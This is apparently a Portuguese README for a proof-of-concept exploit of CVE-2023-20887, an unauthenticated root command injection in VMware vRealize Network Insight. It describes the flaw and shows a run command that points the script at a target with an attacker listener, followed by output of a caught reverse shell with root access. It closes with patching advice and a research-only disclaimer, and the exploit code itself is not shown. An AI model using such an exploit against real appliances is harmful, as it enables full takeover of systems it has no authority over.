
VMWare vRealize Network Insight RCE Pré-Autenticado (CVE-2023-20887)
PoC para CVE-2023-20887 VMware Aria Operations for Networks (vRealize Network Insight) RCE não autenticado
Uma análise de causa raiz da vulnerabilidade pode ser encontrada no meu blog: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
O VMware Aria Operations for Networks (vRealize Network Insight) é vulnerável a injeção de comandos ao aceitar entrada do usuário através da interface RPC Apache Thrift. Essa vulnerabilidade permite que um atacante remoto não autenticado execute comandos arbitrários no sistema operacional subjacente como usuário root. A interface RPC é protegida por um proxy reverso que pode ser contornado. A VMware avaliou a gravidade desse problema como na faixa de severidade Crítica, com uma pontuação máxima de base CVSSv3 de 9.8. Um ator malicioso pode obter execução remota de código no contexto de 'root' no appliance. As versões 6.x do VMWare são vulneráveis.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Atualize para a versão mais recente ou mitigue seguindo as instruções no Progress Advisory
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.